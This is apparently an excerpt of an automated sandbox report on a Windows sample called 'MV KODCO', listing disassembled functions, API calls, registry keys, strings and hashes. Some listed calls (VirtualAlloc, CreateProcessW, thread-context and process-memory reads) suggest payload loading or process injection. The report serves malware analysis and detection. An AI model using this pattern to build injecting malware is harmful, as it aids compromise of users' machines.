                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                          • String ID: #$0$AutoIt v3
                                                          • API String ID: 423443420-4155596026
                                                          • Opcode ID: d914d3a6fde6ba922fd9cc855b6200befc7ab004856f4cc3dab286b13de44cd9
                                                          • Instruction ID: 326572daec2b87f1667cb7b68acbd151253935c8b0a87f356ab24f3450d37109
                                                          • Opcode Fuzzy Hash: d914d3a6fde6ba922fd9cc855b6200befc7ab004856f4cc3dab286b13de44cd9
                                                          • Instruction Fuzzy Hash: 472179B0E04314AFCB04EFA9EC49A99BFF6FB4A310F00511AE214A73A1D7755940CFA1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1022 60acb3-60ace0 call 606ac0 call 607cf4 call 606986 1029 60ace2-60acf8 call 60e880 1022->1029 1030 60acfd-60ad02 1022->1030 1036 60af52-60af57 call 606b05 1029->1036 1032 60ad08-60ad0f 1030->1032 1034 60ad11-60ad40 1032->1034 1035 60ad42-60ad51 GetStartupInfoW 1032->1035 1034->1032 1037 60ae80-60ae86 1035->1037 1038 60ad57-60ad5c 1035->1038 1041 60af44-60af50 call 60af58 1037->1041 1042 60ae8c-60ae9d 1037->1042 1038->1037 1040 60ad62-60ad79 1038->1040 1045 60ad80-60ad83 1040->1045 1046 60ad7b-60ad7d 1040->1046 1041->1036 1047 60aeb2-60aeb8 1042->1047 1048 60ae9f-60aea2 1042->1048 1053 60ad86-60ad8c 1045->1053 1046->1045 1051 60aeba-60aebd 1047->1051 1052 60aebf-60aec6 1047->1052 1048->1047 1049 60aea4-60aead 1048->1049 1054 60af3e-60af3f 1049->1054 1055 60aec9-60aed5 GetStdHandle 1051->1055 1052->1055 1056 60adae-60adb6 1053->1056 1057 60ad8e-60ad9f call 606986 1053->1057 1054->1037 1059 60aed7-60aed9 1055->1059 1060 60af1c-60af32 1055->1060 1058 60adb9-60adbb 1056->1058 1069 60ae33-60ae3a 1057->1069 1070 60ada5-60adab 1057->1070 1058->1037 1062 60adc1-60adc6 1058->1062 1059->1060 1063 60aedb-60aee4 GetFileType 1059->1063 1060->1054 1065 60af34-60af37 1060->1065 1066 60ae20-60ae31 1062->1066 1067 60adc8-60adcb 1062->1067 1063->1060 1068 60aee6-60aef0 1063->1068 1065->1054 1066->1058 1067->1066 1071 60adcd-60add1 1067->1071 1072 60aef2-60aef8 1068->1072 1073 60aefa-60aefd 1068->1073 1074 60ae40-60ae4e 1069->1074 1070->1056 1071->1066 1075 60add3-60add5 1071->1075 1076 60af05 1072->1076 1077 60af08-60af1a InitializeCriticalSectionAndSpinCount 1073->1077 1078 60aeff-60af03 1073->1078 1079 60ae50-60ae72 1074->1079 1080 60ae74-60ae7b 1074->1080 1081 60ade5-60ae1a InitializeCriticalSectionAndSpinCount 1075->1081 1082 60add7-60ade3 GetFileType 1075->1082 1076->1077 1077->1054 1078->1076 1079->1074 1080->1053 1083 60ae1d 1081->1083 1082->1081 1082->1083 1083->1066
                                                          APIs
                                                          • __lock.LIBCMT ref: 0060ACC1
                                                            • Part of subcall function 00607CF4: __mtinitlocknum.LIBCMT ref: 00607D06
                                                            • Part of subcall function 00607CF4: EnterCriticalSection.KERNEL32(00000000,?,00607ADD,0000000D), ref: 00607D1F
                                                          • __calloc_crt.LIBCMT ref: 0060ACD2
                                                            • Part of subcall function 00606986: __calloc_impl.LIBCMT ref: 00606995
                                                            • Part of subcall function 00606986: Sleep.KERNEL32(00000000,000003BC,005FF507,?,0000000E), ref: 006069AC
                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0060ACED
                                                          • GetStartupInfoW.KERNEL32(?,00696E28,00000064,00605E91,00696C70,00000014), ref: 0060AD46
                                                          • __calloc_crt.LIBCMT ref: 0060AD91
                                                          • GetFileType.KERNEL32(00000001), ref: 0060ADD8
                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0060AE11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                          • String ID:
                                                          • API String ID: 1426640281-0
                                                          • Opcode ID: d4b2ff13b4870795fb9f6b7ddc746c6ef727f8960de73849a2343f2408430753
                                                          • Instruction ID: 94c12b6d0614b7d4d57391b078482441a354cf2998d11f213af14562c71aa8fa
                                                          • Opcode Fuzzy Hash: d4b2ff13b4870795fb9f6b7ddc746c6ef727f8960de73849a2343f2408430753
                                                          • Instruction Fuzzy Hash: 2281F5719853468FDB18CFA8C8405AFBBF2AF06364B24525DE4A6AB3D1C7349803DF56

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1084 1073cd0-1073d7e call 1071710 1087 1073d85-1073dab call 1074be0 CreateFileW 1084->1087 1090 1073db2-1073dc2 1087->1090 1091 1073dad 1087->1091 1098 1073dc4 1090->1098 1099 1073dc9-1073de3 VirtualAlloc 1090->1099 1092 1073efd-1073f01 1091->1092 1093 1073f43-1073f46 1092->1093 1094 1073f03-1073f07 1092->1094 1100 1073f49-1073f50 1093->1100 1096 1073f13-1073f17 1094->1096 1097 1073f09-1073f0c 1094->1097 1101 1073f27-1073f2b 1096->1101 1102 1073f19-1073f23 1096->1102 1097->1096 1098->1092 1103 1073de5 1099->1103 1104 1073dea-1073e01 ReadFile 1099->1104 1105 1073fa5-1073fba 1100->1105 1106 1073f52-1073f5d 1100->1106 1109 1073f2d-1073f37 1101->1109 1110 1073f3b 1101->1110 1102->1101 1103->1092 1111 1073e03 1104->1111 1112 1073e08-1073e48 VirtualAlloc 1104->1112 1107 1073fbc-1073fc7 VirtualFree 1105->1107 1108 1073fca-1073fd2 1105->1108 1113 1073f61-1073f6d 1106->1113 1114 1073f5f 1106->1114 1107->1108 1109->1110 1110->1093 1111->1092 1117 1073e4f-1073e6a call 1074e30 1112->1117 1118 1073e4a 1112->1118 1115 1073f81-1073f8d 1113->1115 1116 1073f6f-1073f7f 1113->1116 1114->1105 1120 1073f8f-1073f98 1115->1120 1121 1073f9a-1073fa0 1115->1121 1119 1073fa3 1116->1119 1124 1073e75-1073e7f 1117->1124 1118->1092 1119->1100 1120->1119 1121->1119 1125 1073eb2-1073ec6 call 1074c40 1124->1125 1126 1073e81-1073eb0 call 1074e30 1124->1126 1132 1073eca-1073ece 1125->1132 1133 1073ec8 1125->1133 1126->1124 1134 1073ed0-1073ed4 CloseHandle 1132->1134 1135 1073eda-1073ede 1132->1135 1133->1092 1134->1135 1136 1073ee0-1073eeb VirtualFree 1135->1136 1137 1073eee-1073ef7 1135->1137 1136->1137 1137->1087 1137->1092
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01073DA1
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01073FC7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710772813.0000000001071000.00000040.00000020.00020000.00000000.sdmp, Offset: 01071000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1071000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CreateFileFreeVirtual
                                                          • String ID:
                                                          • API String ID: 204039940-0
                                                          • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                          • Instruction ID: 9cec9bb3361b0d655196007a604dd5f229f70170eb7215f52cc5ddca85ba81b6
                                                          • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                          • Instruction Fuzzy Hash: 65A12A70E00209EBEB54CFA4C894BEEBBB5FF48304F208599E245BB280D7759A41DF58

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1193 5e49fb-5e4a25 call 5ebcce RegOpenKeyExW 1196 5e4a2b-5e4a2f 1193->1196 1197 6541cc-6541e3 RegQueryValueExW 1193->1197 1198 6541e5-654222 call 5ff4ea call 5e47b7 RegQueryValueExW 1197->1198 1199 654246-65424f RegCloseKey 1197->1199 1204 654224-65423b call 5e6a63 1198->1204 1205 65423d-654245 call 5e47e2 1198->1205 1204->1205 1205->1199
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 005E4A1D
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006541DB
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0065421A
                                                          • RegCloseKey.ADVAPI32(?), ref: 00654249
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$CloseOpen
                                                          • String ID: Include$Software\AutoIt v3\AutoIt
                                                          • API String ID: 1586453840-614718249
                                                          • Opcode ID: 41732a15b5ba462f017c93713b80d41f25ee44473802e22b90634f0e32f00d35
                                                          • Instruction ID: f26643007d6381b7caa20cd25583ab8eea9cb01dcdc31fd35516bf9c722b0af3
                                                          • Opcode Fuzzy Hash: 41732a15b5ba462f017c93713b80d41f25ee44473802e22b90634f0e32f00d35
                                                          • Instruction Fuzzy Hash: 84116D71A00109BFEB04ABA4CD8ADFF7BBDEF04358F005468F506D2191EA709E46DB50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1220 5e36b8-5e3728 CreateWindowExW * 2 ShowWindow * 2
                                                          APIs
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005E36E6
                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005E3707
                                                          • ShowWindow.USER32(00000000,?,?,?,?,005E3AA3,?), ref: 005E371B
                                                          • ShowWindow.USER32(00000000,?,?,?,?,005E3AA3,?), ref: 005E3724
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateShow
                                                          • String ID: AutoIt v3$edit
                                                          • API String ID: 1584632944-3779509399
                                                          • Opcode ID: 25889e3be05ba071eb40c96be2863c828d8b6b2f53db26e22a21885f941c98a1
                                                          • Instruction ID: 81df4989671c70d9b9aa57200a128b2a0229a4cd5a1dc01e34da4c40e38ddfc1
                                                          • Opcode Fuzzy Hash: 25889e3be05ba071eb40c96be2863c828d8b6b2f53db26e22a21885f941c98a1
                                                          • Instruction Fuzzy Hash: 4CF0D071A402E47AD7316757AC08E673E7FD7C7F60F01501EFA08961A0C9611895DEB1

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 005E22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,005E24F1), ref: 005E2303
                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 005E25A1
                                                          • CoInitialize.OLE32(00000000), ref: 005E2618
                                                          • CloseHandle.KERNEL32(00000000), ref: 0065503A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                          • String ID: `y$py$V
                                                          • API String ID: 3815369404-1722507585
                                                          • Opcode ID: 7ae5300940f16fff86e55ea23971a4badf9e5b7b874bac4b73353ebbbfcb08c6
                                                          • Instruction ID: 0ded117fcc23772c8b349128215be2054aa3bf4d619d40c2c5ed5d7e6df2234c
                                                          • Opcode Fuzzy Hash: 7ae5300940f16fff86e55ea23971a4badf9e5b7b874bac4b73353ebbbfcb08c6
                                                          • Instruction Fuzzy Hash: 5371C4B89012958B8B04FF5AA994654BFE7FB9B340F80616ED119CF771C730AA80CF14
                                                          APIs
                                                            • Part of subcall function 010739B0: Sleep.KERNELBASE(000001F4), ref: 010739C1
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01073BC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710772813.0000000001071000.00000040.00000020.00020000.00000000.sdmp, Offset: 01071000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1071000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CreateFileSleep
                                                          • String ID: TL02XX5MRB5A46U6S8C
                                                          • API String ID: 2694422964-1674350183
                                                          • Opcode ID: 42b783b288988dd270c4a262bf5b56eb5c3034d71de0fa7d509bd189afc69aaa
                                                          • Instruction ID: 3944c6b8d60a31a467d404e840ce157c4622f15dbae826cb4e47520687b8421b
                                                          • Opcode Fuzzy Hash: 42b783b288988dd270c4a262bf5b56eb5c3034d71de0fa7d509bd189afc69aaa
                                                          • Instruction Fuzzy Hash: 03519431D0424DEAEF11DBA4C918BEFBBB8AF15300F044199E6497B2C0D7B91B48DBA5
                                                          APIs
                                                            • Part of subcall function 005E5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006A1148,?,005E61FF,?,00000000,00000001,00000000), ref: 005E5392
                                                            • Part of subcall function 005E49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 005E4A1D
                                                          • _wcscat.LIBCMT ref: 00652D80
                                                          • _wcscat.LIBCMT ref: 00652DB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _wcscat$FileModuleNameOpen
                                                          • String ID: 8!j$\$\Include\
                                                          • API String ID: 3592542968-1575505250
                                                          • Opcode ID: 68a1e39c7ed0f5d79d41b15a9faaf9c84af122772bd52990f4bfe42f725811d5
                                                          • Instruction ID: 9ac24d84ee9c7c889e3616b91546becf1a69d0a9014cbd006544767e810fa668
                                                          • Opcode Fuzzy Hash: 68a1e39c7ed0f5d79d41b15a9faaf9c84af122772bd52990f4bfe42f725811d5
                                                          • Instruction Fuzzy Hash: 075174754443829BC718FF59D8A589ABBFAFF9A300B40552EF78583260EB30AD49CF51
                                                          APIs
                                                          • _memset.LIBCMT ref: 005E522F
                                                          • _wcscpy.LIBCMT ref: 005E5283
                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 005E5293
                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00653CB0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                          • String ID: Line:
                                                          • API String ID: 1053898822-1585850449
                                                          • Opcode ID: 41aa5516b79fddd46c2c92373bb9dd616f53496aacd17e0ac7362149111d1a11
                                                          • Instruction ID: 1594108a0fba7ed1f07142d6ce6b7d4c16d8fe8fe556e4366e11cd0b6c8281ab
                                                          • Opcode Fuzzy Hash: 41aa5516b79fddd46c2c92373bb9dd616f53496aacd17e0ac7362149111d1a11
                                                          • Instruction Fuzzy Hash: 3E31D035408381AAD328EB61DC4AFDB7BD8BF86344F00451EF6C586191EF70AA48CB96
                                                          APIs
                                                            • Part of subcall function 005E41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,005E39FE,?,00000001), ref: 005E41DB
                                                          • _free.LIBCMT ref: 006536B7
                                                          • _free.LIBCMT ref: 006536FE
                                                            • Part of subcall function 005EC833: __wsplitpath.LIBCMT ref: 005EC93E
                                                            • Part of subcall function 005EC833: _wcscpy.LIBCMT ref: 005EC953
                                                            • Part of subcall function 005EC833: _wcscat.LIBCMT ref: 005EC968
                                                            • Part of subcall function 005EC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 005EC978
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                          • API String ID: 805182592-1757145024
                                                          • Opcode ID: c0cea16be18476d6aeae0edb52442cac662ac873ef490ec780e86f4a05f2f072
                                                          • Instruction ID: ef7ce6300e7a303239d68c1bf13f60c7fe4cd55f93073257b6bf2682e8370571
                                                          • Opcode Fuzzy Hash: c0cea16be18476d6aeae0edb52442cac662ac873ef490ec780e86f4a05f2f072
                                                          • Instruction Fuzzy Hash: 1F919071910269AFCF08EFA5CC959EEBBB5BF48750F004429F856AB391DB349A05CF50
                                                          APIs
                                                          • _memset.LIBCMT ref: 00653725
                                                          • GetOpenFileNameW.COMDLG32 ref: 0065376F
                                                            • Part of subcall function 005E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005E53B1,?,?,005E61FF,?,00000000,00000001,00000000), ref: 005E662F
                                                            • Part of subcall function 005E40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005E40C6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                          • String ID: X$t3i
                                                          • API String ID: 3777226403-1928083262
                                                          • Opcode ID: 6a0bca53326da80ffc5fc490f94f8ac325a13deceac42e1cda52a7d2c1dafef8
                                                          • Instruction ID: b3ae4d7b44c24ada83124d485efa970f98de2203d7ce6c27af794347dd82cd10
                                                          • Opcode Fuzzy Hash: 6a0bca53326da80ffc5fc490f94f8ac325a13deceac42e1cda52a7d2c1dafef8
                                                          • Instruction Fuzzy Hash: 0421C371E10198ABCF05DF95C8057EEBFFDAF89700F004019E445AB281DBB45A898F65
                                                          APIs
                                                          • __getstream.LIBCMT ref: 006034FE
                                                            • Part of subcall function 00607C0E: __getptd_noexit.LIBCMT ref: 00607C0E
                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00603539
                                                          • __wopenfile.LIBCMT ref: 00603549
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                          • String ID: <G
                                                          • API String ID: 1820251861-2138716496
                                                          • Opcode ID: 5474e93d896dd8ef9776ce2b712b0a0654b0d48a7c2c4556b350addb08dbea0f
                                                          • Instruction ID: 6a11fd8b39ffb2c8677dd2a379d817746f5d5ecb52096336104d31d1fde1b89a
                                                          • Opcode Fuzzy Hash: 5474e93d896dd8ef9776ce2b712b0a0654b0d48a7c2c4556b350addb08dbea0f
                                                          • Instruction Fuzzy Hash: CD11C470E802269EDB9ABF718C4266F36EBAF05350B158C29F415CB3D1EB70CA1197A1
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,005FD28B,SwapMouseButtons,00000004,?), ref: 005FD2BC
                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,005FD28B,SwapMouseButtons,00000004,?,?,?,?,005FC865), ref: 005FD2DD
                                                          • RegCloseKey.KERNELBASE(00000000,?,?,005FD28B,SwapMouseButtons,00000004,?,?,?,?,005FC865), ref: 005FD2FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Control Panel\Mouse
                                                          • API String ID: 3677997916-824357125
                                                          • Opcode ID: b033d446cf13a6e319bd2df1284f7be753f4e8f2b84235a60359c6adabd0909e
                                                          • Instruction ID: 0e56aa83850521970432bb694bc0e656460feda7eddc8a8a694620731031cfb9
                                                          • Opcode Fuzzy Hash: b033d446cf13a6e319bd2df1284f7be753f4e8f2b84235a60359c6adabd0909e
                                                          • Instruction Fuzzy Hash: 3C117975A1120CBFDB218FA8CC84EBF7BB9FF04744F004829EA01D7160E675AE409B60
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 0107316B
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01073201
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01073223
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710772813.0000000001071000.00000040.00000020.00020000.00000000.sdmp, Offset: 01071000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1071000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: fc310a6135c3389c0587bc6629e9838c2c50d5be0bfc8bfa2df8a04cac11b1e3
                                                          • Instruction ID: fa41f3957026bfd67d320d3cb7278ff189ac13961a3b27dcaadb385537dff8db
                                                          • Opcode Fuzzy Hash: fc310a6135c3389c0587bc6629e9838c2c50d5be0bfc8bfa2df8a04cac11b1e3
                                                          • Instruction Fuzzy Hash: E662E830E142589BEB24CFA4C850BDEB776FF58700F1091A9D24DEB290E7769E81CB59
                                                          APIs
                                                            • Part of subcall function 005E4517: _fseek.LIBCMT ref: 005E452F
                                                            • Part of subcall function 0062C56D: _wcscmp.LIBCMT ref: 0062C65D
                                                            • Part of subcall function 0062C56D: _wcscmp.LIBCMT ref: 0062C670
                                                          • _free.LIBCMT ref: 0062C4DD
                                                          • _free.LIBCMT ref: 0062C4E4
                                                          • _free.LIBCMT ref: 0062C54F
                                                            • Part of subcall function 00601C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00607A85), ref: 00601CB1
                                                            • Part of subcall function 00601C9D: GetLastError.KERNEL32(00000000,?,00607A85), ref: 00601CC3
                                                          • _free.LIBCMT ref: 0062C557
                                                          Memory Dump Source
